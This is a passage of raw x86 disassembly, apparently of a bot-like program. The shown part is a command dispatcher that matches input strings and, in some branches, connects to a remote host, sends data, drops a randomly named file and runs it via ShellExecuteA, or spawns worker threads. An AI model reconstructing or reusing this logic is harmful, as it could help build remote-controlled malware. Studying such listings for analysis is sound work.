jnz loc_412AF4
push ebx
push 0Ch
call sub_417614
pop ecx
cmp eax, ebx
pop ecx
jle short loc_411C93
push eax
push 439CB8h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_411C93: ; CODE XREF: sub_40FCA3+1FE3�j
push 439C7Ch
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_411C9D: ; CODE XREF: sub_40FCA3+1EBF�j
push dword ptr [ebp+arg_8]
push 439C74h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414584
push dword ptr [ebp+arg_8]
push 439C68h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414584
push dword ptr [ebp+arg_8]
push 439C60h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414563
push dword ptr [ebp+arg_8]
push 439C60h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414563
push dword ptr [ebp+arg_8]
push 439C58h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411F9E
cmp dword ptr byte_445EDC+14h, ebx
jz short loc_411D2A
cmp dword ptr byte_445EDC+3Ch, ebx
jz short loc_411D2A
push 439C10h
jmp loc_414B41
; ---------------------------------------------------------------------------
loc_411D2A: ; CODE XREF: sub_40FCA3+2073�j
; sub_40FCA3+207B�j
cmp [ebp+var_C], ebx
jz loc_412721
mov eax, [ebp+esi+hFile]
mov [ebp+addr], ebx
cmp eax, ebx
mov dword ptr [ebp+lpNewFileName], eax
jz short loc_411D52
push eax
push [ebp+var_C]
call sub_417F60
pop ecx
mov [ebp+addr], eax
pop ecx
loc_411D52: ; CODE XREF: sub_40FCA3+209F�j
push edi
push 4340D0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411DBE
cmp dword ptr [ebp+lpNewFileName], ebx
jz short loc_411D8C
push [ebp+addr] ; lpServiceName
push 3 ; int
loc_411D6D: ; CODE XREF: sub_40FCA3+2131�j
; sub_40FCA3+2149�j ...
call sub_40E271
push eax
lea eax, [ebp+var_2EC]
push 42744Ch
push eax
call sub_41795B
add esp, 14h
jmp loc_412721
; ---------------------------------------------------------------------------
loc_411D8C: ; CODE XREF: sub_40FCA3+20C3�j
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E518
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2EC]
jz short loc_411DB4
push 439BDCh
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411DB4: ; CODE XREF: sub_40FCA3+2105�j
push 439BACh
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411DBE: ; CODE XREF: sub_40FCA3+20BE�j
push edi
push 43A42Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411DD6
push [ebp+addr]
push 4
jmp short loc_411D6D
; ---------------------------------------------------------------------------
loc_411DD6: ; CODE XREF: sub_40FCA3+212A�j
push edi
push 439BA4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411DF1
push [ebp+addr]
push 5
jmp loc_411D6D
; ---------------------------------------------------------------------------
loc_411DF1: ; CODE XREF: sub_40FCA3+2142�j
push edi
push 436290h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411E0C
push [ebp+addr]
push 6
jmp loc_411D6D
; ---------------------------------------------------------------------------
loc_411E0C: ; CODE XREF: sub_40FCA3+215D�j
push edi
push 439F78h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411E27
push [ebp+addr]
push 1
jmp loc_411D6D
; ---------------------------------------------------------------------------
loc_411E27: ; CODE XREF: sub_40FCA3+2178�j
push edi
push 439B9Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411EAA
cmp dword ptr [ebp+lpNewFileName], ebx
jz short loc_411E77
cmp [ebp+var_A5C], bl
jz short loc_411E4D
push ebx
push dword ptr [ebp+lpNewFileName]
push 1
jmp short loc_411E58
; ---------------------------------------------------------------------------
loc_411E4D: ; CODE XREF: sub_40FCA3+21A0�j
push [ebp+esi+var_88]
push dword ptr [ebp+lpNewFileName]
push ebx
loc_411E58: ; CODE XREF: sub_40FCA3+21A8�j
call sub_40E658
push eax
lea eax, [ebp+var_2EC]
push 42744Ch
push eax
call sub_41795B
add esp, 18h
jmp loc_412721
; ---------------------------------------------------------------------------
loc_411E77: ; CODE XREF: sub_40FCA3+2198�j
push ebx ; lpMultiByteStr
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E84D
add esp, 10h
test eax, eax
lea eax, [ebp+var_2EC]
jz short loc_411EA0
push 439B6Ch
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411EA0: ; CODE XREF: sub_40FCA3+21F1�j
push 439B3Ch
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411EAA: ; CODE XREF: sub_40FCA3+2193�j
push edi
push 439B34h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411F46
mov eax, dword ptr [ebp+lpNewFileName]
cmp eax, ebx
jz short loc_411F13
push [ebp+var_4] ; int
cmp [ebp+var_A5C], bl
push [ebp+hFile] ; int
push [ebp+s] ; s
jz short loc_411EE0
push ebx
push eax
push 1
jmp short loc_411EF4
; ---------------------------------------------------------------------------
loc_411EE0: ; CODE XREF: sub_40FCA3+2235�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jz short loc_411EF0
push esi
push eax
push ebx
jmp short loc_411EF4
; ---------------------------------------------------------------------------
loc_411EF0: ; CODE XREF: sub_40FCA3+2246�j
push ebx ; int
push eax ; int
push 2 ; int
loc_411EF4: ; CODE XREF: sub_40FCA3+223B�j
; sub_40FCA3+224B�j
call sub_40E96E
push eax
lea eax, [ebp+var_2EC]
push 42744Ch
push eax
call sub_41795B
add esp, 24h
jmp loc_412721
; ---------------------------------------------------------------------------
loc_411F13: ; CODE XREF: sub_40FCA3+2221�j
push ebx ; lpMultiByteStr
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40EE82
add esp, 10h
test eax, eax
lea eax, [ebp+var_2EC]
jz short loc_411F3C
push 439B04h
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411F3C: ; CODE XREF: sub_40FCA3+228D�j
push 439AD8h
jmp loc_414B47
; ---------------------------------------------------------------------------
loc_411F46: ; CODE XREF: sub_40FCA3+2216�j
push edi
push 42DBCCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411F94
cmp dword ptr [ebp+lpNewFileName], ebx
jz short loc_411F8A
push [ebp+var_4]
push [ebp+hFile]
push [ebp+s]
push [ebp+addr] ; lpMultiByteStr
call sub_40F12C
push eax
lea eax, [ebp+var_2EC]
push 42744Ch
push eax
call sub_41795B
add esp, 1Ch
jmp loc_412721
; ---------------------------------------------------------------------------
loc_411F8A: ; CODE XREF: sub_40FCA3+22B7�j
push 439AA8h
jmp loc_414B41
; ---------------------------------------------------------------------------
loc_411F94: ; CODE XREF: sub_40FCA3+22B2�j
push 439A7Ch
jmp loc_414B41
; ---------------------------------------------------------------------------
loc_411F9E: ; CODE XREF: sub_40FCA3+2067�j
push dword ptr [ebp+arg_8]
push 436564h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414307
push dword ptr [ebp+arg_8]
push 439A74h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414307
push dword ptr [ebp+arg_8]
push 439A6Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414229
push dword ptr [ebp+arg_8]
push 439A64h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414229
mov eax, [ebp+esi+hFile]
cmp eax, ebx
mov dword ptr [ebp+lpNewFileName], eax
jz loc_4100FB
push dword ptr [ebp+arg_8]
push 439A54h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4141EA
push dword ptr [ebp+arg_8]
push 439A4Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4141EA
push dword ptr [ebp+arg_8]
push 439A40h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414194
push dword ptr [ebp+arg_8]
push 439A38h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414194
push dword ptr [ebp+arg_8]
push 439A2Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414126
push dword ptr [ebp+arg_8]
push 439A24h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414126
push dword ptr [ebp+arg_8]
push 439A1Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4140C0
push dword ptr [ebp+arg_8]
push 439A14h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4140C0
push dword ptr [ebp+arg_8]
push 439A08h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414089
push dword ptr [ebp+arg_8]
push 439A00h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414089
push dword ptr [ebp+arg_8]
push 4399F4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41401E
push dword ptr [ebp+arg_8]
push 4399E8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41401E
push dword ptr [ebp+arg_8]
push 4399DCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F9C
push dword ptr [ebp+arg_8]
push 4399D4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F9C
push dword ptr [ebp+arg_8]
push 4399C8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F2E
push dword ptr [ebp+arg_8]
push 4399BCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F2E
push dword ptr [ebp+arg_8]
push 4399B0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F08
push dword ptr [ebp+arg_8]
push 4399A8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413F08
push dword ptr [ebp+arg_8]
push 43999Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413EA8
push dword ptr [ebp+arg_8]
push 439994h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413EA8
push dword ptr [ebp+arg_8]
push 439988h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413DE2
push dword ptr [ebp+arg_8]
push 439980h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413DE2
push dword ptr [ebp+arg_8]
push 439974h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413D47
push dword ptr [ebp+arg_8]
push 43996Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413D47
push dword ptr [ebp+arg_8]
push 439964h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413BC7
push dword ptr [ebp+arg_8]
push 43995Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413BC7
push dword ptr [ebp+arg_8]
push 439954h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413B2E
push dword ptr [ebp+arg_8]
push 43994Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413B2E
push dword ptr [ebp+arg_8]
push 439940h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413A22
push dword ptr [ebp+arg_8]
push 43993Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_413A22
push dword ptr [ebp+arg_8]
push 439934h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push dword ptr [ebp+arg_8]
push 43992Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4139CE
push dword ptr [ebp+arg_8]
push 439924h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4138D4
push dword ptr [ebp+arg_8]
push 43991Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4138D4
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+addr], eax
jz loc_4100FB
push dword ptr [ebp+arg_8]
push 439910h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4137EA
push dword ptr [ebp+arg_8]
push 439904h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4137EA
push dword ptr [ebp+arg_8]
push 42649Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4136CB
push dword ptr [ebp+arg_8]
push 4260C4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4136CB
push dword ptr [ebp+arg_8]
push 4260B8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4136CB
push dword ptr [ebp+arg_8]
push 4398F8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4135E4
push dword ptr [ebp+arg_8]
push 4398ECh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4135E4
push dword ptr [ebp+arg_8]
push 4398E0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4134A7
push dword ptr [ebp+arg_8]
push 435EF0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4134A7
push dword ptr [ebp+arg_8]
push 4398D4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4133AE
push dword ptr [ebp+arg_8]
push 4398C8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4133AE
push dword ptr [ebp+arg_8]
push 4398BCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4132A5
push dword ptr [ebp+arg_8]
push 4398B4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4132A5
push dword ptr [ebp+arg_8]
push 4398A4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4131D0
push dword ptr [ebp+arg_8]
push 439898h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4131D0
push dword ptr [ebp+arg_8]
push 439888h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4130BE
push dword ptr [ebp+arg_8]
push 43987Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4130BE
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov dword ptr [ebp+arg_10], eax
jz loc_4100FB
push dword ptr [ebp+arg_8]
push 4340D0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412D63
push dword ptr [ebp+arg_8]
push 439874h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412D63
push dword ptr [ebp+arg_8]
push 439868h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412C44
push dword ptr [ebp+arg_8]
push 43985Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412C44
push dword ptr [ebp+arg_8]
push 439858h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412C44
push dword ptr [ebp+arg_8]
push 43984Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412B1E
push dword ptr [ebp+arg_8]
push 439840h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412B1E
push dword ptr [ebp+arg_8]
push 43983Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_412B1E
push dword ptr [ebp+arg_8]
push 439830h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41295C
push dword ptr [ebp+arg_8]
push 439824h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41295C
push dword ptr [ebp+arg_8]
push 439818h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_412759
lea eax, [ebp+Parameters]
push edi
push eax
call sub_417FE0
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
push [ebp+addr]
mov dword ptr [ebp+lpNewFileName], eax
lea eax, [ebp+var_20A8]
push eax
call sub_417FE0
push dword ptr [ebp+arg_10]
lea eax, [ebp+var_1864]
push eax
call sub_417FE0
push 42AD00h
push 439814h
push [ebp+esi+var_80]
call sub_40B124
push eax
lea eax, [ebp+var_7C0]
push eax
call sub_417FE0
add esp, 30h
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call WSAStartup_0
lea eax, [ebp+Parameters]
push eax ; name
call gethostbyname ; gethostbyname
push 6 ; protocol
push 1 ; type
push 2 ; af
mov edi, eax
call socket_0
push dword ptr [ebp+lpNewFileName] ; hostshort
mov esi, eax
mov [ebp+name.sa_family], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov dword ptr [ebp+name.sa_data+2], eax
call htons_2
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+var_7C0]
push eax
lea eax, [ebp+var_20A8]
push eax
lea eax, [ebp+var_7C0]
push eax
lea eax, [ebp+var_1864]
push eax
lea eax, [ebp+var_20A8]
push eax
lea eax, [ebp+var_28A8]
push 4397C8h
push eax
call sub_41795B
add esp, 1Ch
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect_0
mov edi, 100h
push ebx ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push esi ; s
call recv_0
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+var_28A8]
push eax ; buf
push esi ; s
call send_0
push ebx ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push esi ; s
call recv_0
push esi ; s
call closesocket_0
call WSACleanup_0
lea eax, [ebp+var_1864]
push eax
push 439784h
loc_412712: ; CODE XREF: sub_40FCA3+3C17�j
; sub_40FCA3+4080�j
lea eax, [ebp+var_2EC]
loc_412718: ; CODE XREF: sub_40FCA3+3F1F�j
; sub_40FCA3+4ACC�j ...
push eax
call sub_41795B
add esp, 0Ch
loc_412721: ; CODE XREF: sub_40FCA3+208A�j
; sub_40FCA3+20E4�j ...
cmp [ebp+var_8], ebx
jnz short loc_412742
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
loc_41273A: ; CODE XREF: sub_40FCA3+614A�j
call sub_40E1D6
add esp, 14h
loc_412742: ; CODE XREF: sub_40FCA3+2A81�j
; sub_40FCA3+4AC1�j ...
mov esi, [ebp+arg_24]
loc_412745: ; CODE XREF: sub_40FCA3+95A�j
; sub_40FCA3+4DE8�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
pop ecx
mov eax, esi
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_412759: ; CODE XREF: sub_40FCA3+2919�j
push dword ptr [ebp+arg_8]
push 439774h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41292B
push dword ptr [ebp+arg_8]
push 439768h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41292B
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_4100FB
push dword ptr [ebp+arg_8]
push 43975Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_415F22
push 4
push esi
call sub_40DB69
pop ecx
test eax, eax
pop ecx
jnz short loc_4127FF
push esi
push 43972Ch
loc_4127BE: ; CODE XREF: sub_40FCA3+5043�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 0Ch
loc_4127CD: ; CODE XREF: sub_40FCA3+4581�j
; sub_40FCA3+505B�j
cmp [ebp+var_8], ebx
jnz short loc_4127EE
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
loc_4127E6: ; CODE XREF: sub_40FCA3+590B�j
call sub_40E1D6
add esp, 14h
loc_4127EE: ; CODE XREF: sub_40FCA3+2B2D�j
; sub_40FCA3+58F3�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
jmp loc_4160A3
; ---------------------------------------------------------------------------
loc_4127FF: ; CODE XREF: sub_40FCA3+2B13�j
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
pop ecx
call sub_4179B7
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4179B7
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_4179B7
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1FA8]
push edx
push eax
lea eax, [ebp+FileName]
push 43971Ch
push eax
call sub_41795B
lea eax, [ebp+FileName]
push 439718h
push eax
call sub_41924D
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_4100FB
push esi
push dword ptr [ebp+arg_10]
push [ebp+addr]
push dword ptr [ebp+lpNewFileName]
push edi
push 4396F4h
push eax
call sub_41A334
push [ebp+arg_24]
call sub_418F0B
lea eax, [ebp+FileName]
push eax
lea eax, [ebp+Parameters]
push 4396ECh
push eax
call sub_41795B
add esp, 2Ch
lea eax, [ebp+Parameters]
push ebx ; nShowCmd
push ebx ; lpDirectory
push eax ; lpParameters
push offset File ; lpFile
push offset Operation ; lpOperation
push ebx ; hwnd
call ShellExecuteA ; ShellExecuteA
push edi
push esi
test eax, eax
jz short loc_4128C9
push 4396B0h
jmp short loc_4128CE
; ---------------------------------------------------------------------------
loc_4128C9: ; CODE XREF: sub_40FCA3+2C1D�j
push 439674h
loc_4128CE: ; CODE XREF: sub_40FCA3+2C24�j
call sub_41795B
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4128F7
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4128F7: ; CODE XREF: sub_40FCA3+2C36�j
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
jmp short loc_412911
; ---------------------------------------------------------------------------
loc_412905: ; CODE XREF: sub_40FCA3+2C81�j
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_41A30A
loc_412911: ; CODE XREF: sub_40FCA3+2C60�j
lea eax, [ebp+FileName]
push 4
push eax
call sub_40DB69
add esp, 0Ch
test eax, eax
jnz short loc_412905
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_41292B: ; CODE XREF: sub_40FCA3+2AC7�j
; sub_40FCA3+2ADE�j
push [ebp+esi+var_80] ; int
push dword ptr [ebp+arg_10] ; int
push [ebp+addr] ; int
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
pop ecx
push eax ; hostshort
push edi ; int
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_4073F5
add esp, 24h
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_41295C: ; CODE XREF: sub_40FCA3+28EB�j
; sub_40FCA3+2902�j
mov esi, 80h
push edi
lea eax, [ebp+var_113C]
push esi
push eax
call sub_417EDA
lea eax, [ebp+var_113C]
push eax
push 42649Ch
call sub_417D80
add esp, 14h
test eax, eax
jz short loc_4129BF
lea eax, [ebp+var_113C]
push eax
push 426498h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_4129BF
lea eax, [ebp+var_113C]
push eax
push 426490h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_4129BF
push 43963Ch
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_4129BF: ; CODE XREF: sub_40FCA3+2CE2�j
; sub_40FCA3+2CF9�j ...
push dword ptr [ebp+arg_10]
call sub_417ECF
cmp eax, ebx
pop ecx
mov [ebp+var_1034], eax
jle loc_412AE1
push edi
lea eax, [ebp+var_113C]
push esi
push eax
call sub_417EDA
push dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_11BC]
push esi
push eax
call sub_417EDA
push [ebp+addr]
call sub_417ECF
mov [ebp+var_1038], eax
xor eax, eax
cmp [ebp+var_A4E], bl
push [ebp+hFile]
setnz al
mov [ebp+var_1030], eax
mov eax, [ebp+s]
mov [ebp+var_11C0], eax
lea eax, [ebp+var_10BC]
push esi
push eax
call sub_417EDA
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_1030], ebx
mov [ebp+var_102C], eax
mov eax, [ebp+var_8]
mov [ebp+var_1028], eax
mov eax, 439634h
jnz short loc_412A56
mov eax, 43962Ch
loc_412A56: ; CODE XREF: sub_40FCA3+2DAC�j
push dword ptr [ebp+arg_10]
push [ebp+addr]
push dword ptr [ebp+lpNewFileName]
push edi
push eax
push 4395E8h
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
push ebx
lea eax, [ebp+var_2EC]
push 0Eh
push eax
call sub_41741F
add esp, 2Ch
mov [ebp+var_103C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_11C0]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_402110 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_103C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_412AD7
call GetLastError
push eax
push 4395A0h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_412ACF: ; CODE XREF: sub_40FCA3+2E3A�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_412AD7: ; CODE XREF: sub_40FCA3+2E19�j
cmp [ebp+var_1024], ebx
jz short loc_412ACF
jmp short loc_412AF4
; ---------------------------------------------------------------------------
loc_412AE1: ; CODE XREF: sub_40FCA3+2D2D�j
push 439558h
loc_412AE6: ; CODE XREF: sub_40FCA3+1D9F�j
; sub_40FCA3+1EA9�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
pop ecx
pop ecx
loc_412AF4: ; CODE XREF: sub_40FCA3+1E71�j
; sub_40FCA3+1E85�j ...
cmp [ebp+var_8], ebx
jnz loc_4105FA
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
loc_412B11: ; CODE XREF: sub_40FCA3+3B30�j
; sub_40FCA3+620C�j
call sub_40E1D6
add esp, 14h
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_412B1E: ; CODE XREF: sub_40FCA3+28A6�j
; sub_40FCA3+28BD�j ...
cmp dword ptr byte_445EDC+34h, ebx
jnz loc_412C29
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_5A4], eax
mov eax, [ebp+var_4]
mov [ebp+var_5A8], eax
lea eax, [ebp+var_63C]
push edi
push eax
call sub_419300
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
push [ebp+addr]
mov [ebp+var_5BC], eax
call sub_417ECF
push dword ptr [ebp+arg_10]
mov [ebp+var_5B8], eax
call sub_417ECF
push 7Fh
mov [ebp+var_5B4], eax
push [ebp+hFile]
lea eax, [ebp+var_6BC]
push eax
call sub_419300
push [ebp+var_5B4]
mov eax, [ebp+s]
mov [ebp+var_6C0], eax
lea eax, [ebp+var_63C]
push [ebp+var_5B8]
push eax
lea eax, [ebp+var_2EC]
push [ebp+var_5BC]
push 439500h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 10h
push eax
call sub_41741F
add esp, 48h
mov [ebp+var_5AC], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_6C0]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40182F ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_5AC]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_412C1C
call GetLastError
push eax
push 4394B8h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_412C14: ; CODE XREF: sub_40FCA3+2F7F�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_412C1C: ; CODE XREF: sub_40FCA3+2F5E�j
cmp [ebp+var_5A0], ebx
jz short loc_412C14
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_412C29: ; CODE XREF: sub_40FCA3+2E81�j
push 1FFh
lea eax, [ebp+var_2EC]
push 4394A0h
push eax
call sub_419300
jmp loc_414BC5
; ---------------------------------------------------------------------------
loc_412C44: ; CODE XREF: sub_40FCA3+2861�j
; sub_40FCA3+2878�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_5A4], eax
mov eax, [ebp+var_4]
mov [ebp+var_5A8], eax
lea eax, [ebp+var_63C]
push edi
push eax
call sub_419300
push dword ptr [ebp+lpNewFileName]
call sub_417ECF
push [ebp+addr]
mov [ebp+var_5BC], eax
call sub_417ECF
push dword ptr [ebp+arg_10]
mov [ebp+var_5B8], eax
call sub_417ECF
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_5B4], eax
jz short loc_412CA9
push esi
call sub_417ECF
pop ecx
mov [ebp+var_5B0], eax
jmp short loc_412CAF
; ---------------------------------------------------------------------------
loc_412CA9: ; CODE XREF: sub_40FCA3+2FF5�j
mov [ebp+var_5B0], ebx
loc_412CAF: ; CODE XREF: sub_40FCA3+3004�j
push 7Fh
lea eax, [ebp+var_6BC]
push [ebp+hFile]
push eax
call sub_419300
push [ebp+var_5B4]
mov esi, [ebp+s]
lea eax, [ebp+var_63C]
mov [ebp+var_6C0], esi
push [ebp+var_5B8]
push eax
lea eax, [ebp+var_2EC]
push [ebp+var_5BC]
push 439448h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 11h
push eax
call sub_41741F
add esp, 30h
mov [ebp+var_5AC], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_6C0]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_4019BB ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_5AC]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_412D56
call GetLastError
push eax
push 439400h
jmp loc_4137A9
